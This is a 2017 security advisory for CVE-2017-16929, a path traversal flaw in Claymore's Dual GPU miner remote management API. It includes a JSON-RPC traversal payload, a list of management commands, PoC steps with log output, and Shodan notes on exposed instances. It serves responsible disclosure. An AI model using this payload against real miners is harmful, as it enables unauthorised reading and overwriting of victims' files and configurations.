VuNote

Author:       <github.com/tintinweb>
Ref:          https://github.com/tintinweb/pub/tree/master/pocs/cve-2017-16929
Version:      0.2
Date:         Nov 30th, 2017

Tag:          claymore dual ethereum decred crypto currency miner

Overview

Name:         Claymore's Dual ETH + DCR/SC/LBC/PASC GPU Miner
Vendor:       nanopool/claymore
References:   * https://github.com/nanopool/Claymore-Dual-Miner
              * https://bitcointalk.org/index.php?topic=1433925.0

Version:        10.1 [2]
Latest Version: 10.1 [2]
Other Versions: <= 10.1
Platform(s):    windows, linux
Technology:     C/C++

Vuln Classes:   CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Origin:         remote
Min. Privs.:    authenticated

Source:         Closed; runtime protection mechanisms

CVE:	        CVE-2017-16929

Description

A specialized mining solution with remote management interface for mining ethereum / decred / siacoin / LBRY Credits /
pascal coin.

quote website [1][2]

    - Supports new "dual mining" mode: mining both Ethereum and Decred/Siacoin/Lbry/Pascal at the same time, with no impact on Ethereum mining speed. Ethereum-only mining mode is supported as well.
    - Effective Ethereum mining speed is higher by 3-5% because of a completely different miner code - much less invalid and outdated shares, higher GPU load, optimized OpenCL code, optimized assembler kernels.
    - Supports both AMD and nVidia cards, even mixed.
    - No DAG files.
    - Supports all Stratum versions for Ethereum: can be used directly without any proxies with all pools that support eth-proxy, qtminer or miner-proxy.
    - Supports Ethereum and Siacoin solo mining.
    - Supports both HTTP and Stratum for Decred.
    - Supports both HTTP and Stratum for Siacoin. Note: not all Stratum versions are supported currently for Siacoin.
    - Supports Stratum for Lbry and Pascal.
    - Supports failover.
    - Displays detailed mining information and hashrate for every card.
    - Supports remote monitoring and management.
    - Supports GPU selection, built-in GPU overclocking features and temperature management.
    - Supports Ethereum forks (Expanse, etc).
    - Windows and Linux versions.

Summary

> “FOMO driven security blindness.”

The remote management interface on the Claymore Dual GPU miner 10.1 is vulnerable to an authenticated relative directory
traversal vulnerability exploited by issuing a specially crafted remote management request, allowing a remote attacker
to read/write arbitrary files due to missing path validation/sanitation.

• API calls
• miner_getfile (read) … read any file
• miner_file (write) … write any file

conditions:

• authenticated
• write: not in readonly mode

Successful exploitation would allow an authenticated user to read/write arbitrary files (process permissions)

See attached PoC.

Details

Service Discovery:

• shodan: ‘eth result’ lists about 170-240 publicly available instances [3] with significant hash power
• banner:

<html><body bgcolor="#000000" style="font-family: monospace;">
{"result": ["10.1 - ETH", "4286", "149336;7492;0", "30620;29877;28285;30605;29946", "0;0;0", "off;off;off;off;off", "62;65;51;64;61;75;51;67;62;72", "eth-us-east1.nanopool.org:9999", "0;1;0;0"]}<br><br><font color="#ff0000">Remote management: read-only mode, command miner_file ignored
</font><br><font color="#00ff00">ETH: 11/22/17-15:28:38 - SHARE FOUND - (GPU 3)
....

Remote Management API overview:

# >nc -L -p 3333
{"id":0,"jsonrpc":"2.0","method":"miner_getstat1"}
{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["epools.txt","<encoded>"]}
{"id":0,"jsonrpc":"2.0","method":"miner_getfile","params":["config.txt"]}
{"id":0,"jsonrpc":"2.0","method":"miner_restart"}
{"id":0,"jsonrpc":"2.0","method":"miner_reboot"}
{"id":0,"jsonrpc":"2.0","method":"control_gpu","params":["0", "1"]}
{"id":0,"jsonrpc":"2.0","method":"control_gpu","params":["-1", "0"]}
{"id":0,"jsonrpc":"2.0","method":"control_gpu","params":["0", "2"]}
{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["config.txt","<encoded>"]}
{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["dpools.txt","<encoded>"]}

Directory Traversal:

• miner_file and miner_getfile

both commands do not seem to attempt to sanitize the provided path in any way allowing for relative path traversal.

# Vector: traversal
# Description: path traversal
# Result: retrieves any file
"traversal": {"id":0,
     "jsonrpc":"2.0",
     "method":"miner_getfile",
     "params":["../Claymore.s.Dual.Ethereum.Decred_Siacoin_Lbry_Pascal.AMD.NVIDIA.GPU.Miner.v10.0/config.txt"]}, ##<<-- path travesal

//see PoC vector: traversal

See attached PoC.

Proof of Concept

Prerequisites:

• compatible AMD/NVidia hardware

1. start miner in read/write mode with no passwort being set for testing

#> EthDcrMiner64.exe -epool http://192.168.0.1:8545 -mport 3333
...

2. run poc.py --vector=traversal <target> (we expect EthDcrMiner64.exe to be placed in a directory called /Claymore.s.Dual.Ethereum.Decred_Siacoin_Lbry_Pascal.AMD.NVIDIA.GPU.Miner.v10.0)

[poc.py -             <module>() ][    INFO] --start--
[poc.py -             <module>() ][    INFO] # Claymore's Dual ETH + DCR/SC/LBC/PASC GPU Miner - Remote Buffer Overwrite
[poc.py -             <module>() ][    INFO] # github.com/tintinweb
[poc.py -         iter_targets() ][ WARNING] shodan apikey missing! shodan support disabled.
[poc.py -             <module>() ][    INFO] [i] Target: 127.0.0.1:3333
[poc.py -             <module>() ][    INFO] [+] connected.
[poc.py -             <module>() ][   DEBUG] <-- 1048 '{"id": 0, "error": null, "result": ["../Claymore.s.Dual.Ethereum.Decred_Siacoin_Lbry_Pascal.AMD.NVIDIA.GPU.Miner.v10.0/config.txt", "<encoded file data>"]}'
[poc.py -             <module>() ][    INFO] --done--

3. EthDcrMiner returned the files content, as shown in the logs.

...
 DCR: 11/22/17-22:56:06 - New job from pasc-eu2.nanopool.org:15555
Remote management: file ..\Claymore.s.Dual.Ethereum.Decred_Siacoin_Lbry_Pascal.AMD.NVIDIA.GPU.Miner.v10.0\config.txt was uploaded
 DCR: 11/22/17-22:56:16 - New job from pasc-eu2.nanopool.org:15555
...

Patch

n/A - closed source :/

Notes

• Timeline

  11/22/2017 - vendor contact: report sent
  11/23/2017 - vendor response:
               fixed version 10.2 ready and publicly available
               request for 7+ day embargo
               vendor statement:
                     The root case is that remote management was designed to be used in local network only.
                     But some "smart" people want to share ports to everyone and then catch problems. I will close
                     the issues you found, but attacker will be able to do something bad anyway, at least execute ddos
                     to prevent remote management work as expected.
  12/04/2017 - public disclosure
  

• Vendor Changelog

Latest version is v10.2:

    - fixed critical issues in remote management feature (attacker could crash miner even in read-only mode).
    - now miner supports up to #299 epoch.
    - in rare cases ADL API calls can hang, now watchdog checks it as well.
    - improved "-minspeed" option, check readme for details.
    - added "miner_getstat2" command to remote management, check "API.txt" for details.
    - EthMan: added detailed stats mode in main window.
    - a few minor improvements in both miner and EthMan.

• Runtime Protection

* Linux: packer / just compression
 * gdb
* Windows: protector / anti-debug, vmprotect?
 * x64dbg: DbgUiRemoteBreakin <- RET